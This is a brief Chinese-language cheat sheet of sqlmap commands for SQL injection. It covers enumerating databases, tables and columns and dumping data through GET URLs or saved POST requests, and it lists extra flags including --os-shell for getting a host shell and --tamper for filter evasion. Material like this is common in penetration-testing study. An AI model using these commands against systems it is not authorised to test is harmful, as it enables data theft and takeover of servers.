SQL注入过程

基本命令(GET型)

  • 获取数据库列表: 
    sqlmap -u "URL" --dbs
  • 获取指定数据库的表名: 
    sqlmap -u "URL" -D 数据库名称 --tables
  • 获取指定表的列名: 
    sqlmap -u "URL" -D 数据库名称 -T 数据库表 --columns
  • 导出指定列的数据: 
    sqlmap -u "URL" -D 数据库名称 -T 数据表 -C 列 --dump

基本命令(POST型)

  • 获取数据库列表: 
    sqlmap -r "数据包" --dbs
  • 获取指定数据库的表名: 
    sqlmap -r "数据包" -D 数据库名称 --tables
  • 获取指定表的列名: 
    sqlmap -r "数据包" -D 数据库名称 -T 数据库表 --columns
  • 导出指定列的数据: 
    sqlmap -r "数据包" -D 数据库名称 -T 数据表 -C 列 --dump

部分附加命令

  • 线程设置: 
    --threads 10
  • 请求延时: 
    --delay 秒数
  • 获取主机shell: 
    --os-shell
  • 检索没有body响应的内容(多用于盲注): 
    --null-connection
  • 脚本调用: 
    --tamper 脚本名